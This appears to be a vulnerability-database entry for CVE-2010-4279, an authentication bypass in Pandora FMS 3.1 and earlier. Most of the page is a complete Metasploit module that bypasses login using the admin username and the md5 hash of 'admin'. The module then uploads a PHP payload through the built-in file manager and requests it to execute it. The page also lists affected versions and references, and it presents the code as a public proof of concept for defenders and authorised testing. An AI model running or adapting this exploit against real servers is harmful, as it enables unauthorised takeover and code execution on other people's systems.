CVE-2010-4279

critical

Published 2010-12-02 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

The default configuration of Pandora FMS 3.1 and earlier specifies an empty string for the loginhash_pwd field, which allows remote attackers to bypass authentication by sending a request to index.php with "admin" in the loginhash_user parameter, in conjunction with the md5 hash of "admin" in the loginhash_data parameter.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-35731 remote php verified ruby · 5 KB

Metasploit · 2015-01-08

Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit)

ruby exploit Source: Exploit-DB

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
      'Description'    => %q{
        This module exploits an authentication bypass vulnerability in Pandora v3.1 as
        disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
        upload which allows a user to upload arbitrary files to the '/images/' directory.

        This module was created as an exercise in the Metasploit Mastery Class at Blackhat
        that was facilitated by egypt and mubix.

      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Juan Galiana Lara',                         # Vulnerability discovery
          'Raymond Nunez <rcnunez[at]upd.edu.ph>',     # Metasploit module
          'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module
          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',      # Metasploit module
          '_flood <freshbones[at]gmail.com>',          # Metasploit module
          'mubix <mubix[at]room362.com>',              # Auth bypass and file upload
          'egypt <egypt[at]metasploit.com>',           # Auth bypass and file upload
        ],
      'References'     =>
        [
          ['CVE', '2010-4279'],
          ['OSVDB',   '69549'],
          ['BID',   '45112']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Nov 30 2010",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
      ], self.class)
  end

  def check

    base  = target_uri.path

    # retrieve software version from login page
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(base, 'index.php')
      })
      if res and res.code == 200
        #Tested on v3.1 Build PC100609 and PC100608
        if res.body.include?("v3.1 Build PC10060")
          return Exploit::CheckCode::Appears
        elsif res.body.include?("Pandora")
          return Exploit::CheckCode::Detected
        end
      end
      return Exploit::CheckCode::Safe
    rescue ::Rex::ConnectionError
      vprint_error("#{peer} - Connection failed")
    end
    return Exploit::CheckCode::Unknown

  end

  # upload a payload using the pandora built-in file upload
  def upload(base, file, cookies)
    data = Rex::MIME::Message.new
    data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
    data.add_part("Go", nil, nil, 'form-data; name="go"')
    data.add_part("images", nil, nil, 'form-data; name="directory"')
    data.add_part("1", nil, nil, 'form-data; name="upload_file"')
    data_post = data.to_s
    data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(base, 'index.php'),
      'cookie'  => cookies,
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'vars_get' => {
        'sec'  => 'gsetup',
        'sec2' => 'godmode/setup/file_manager',
      },
      'data'    => data_post
    })

    register_files_for_cleanup(@fname)
    return res
  end

  def exploit

    base   = target_uri.path
    @fname = "#{rand_text_numeric(7)}.php"
    cookies = ""

    # bypass authentication and get session cookie
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(base, 'index.php'),
      'vars_get' => {
        'loginhash_data'  => '21232f297a57a5a743894a0e4a801fc3',
        'loginhash_user' => 'admin',
        'loginhash' => '1',
      },
    })

    # fix if logic
    if res and res.code == 200
      if res.body.include?("Logout")
        cookies = res.get_cookies
        print_status("Login Bypass Successful")
        print_status("cookie monster = " + cookies)
      else
        fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")
      end
    end

    # upload PHP payload to images/[fname]
    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
    php    = %Q|<?php #{payload.encoded} ?>|
    begin
      res = upload(base, php, cookies)
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
    end

    if res and res.code == 200
      print_good("#{peer} - File uploaded successfully")
    else
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
    end

    # retrieve and execute PHP payload
    print_status("#{peer} - Executing payload (images/#{@fname})")
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(base, 'images', "#{@fname}")
      }, 1)
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
    end

  end
end

EDB-15639 webapps php verified

Juan Galiana Lara · 2010-11-30

Pandora FMS 3.1 - Authentication Bypass

Source code queued for fetch — refresh in a moment.

Metasploit modules

exploit_multi/http/pandora_upload_exec rank 600

Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability

Source fetch failed: fetch_error — view the original via the link above.

Application impact

Vendor	Product	Versions
artica	pandora_fms	`{"endIncluding":"3.1"}`
artica	pandora_fms	`1.2`
artica	pandora_fms	`1.3`
artica	pandora_fms	`1.3.1`
artica	pandora_fms	`2.0`
artica	pandora_fms	`2.1`
artica	pandora_fms	`2.1.1`
artica	pandora_fms	`3.0`
artica	pandora_fms	`3.1`

References

CWEs

CWE-287

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.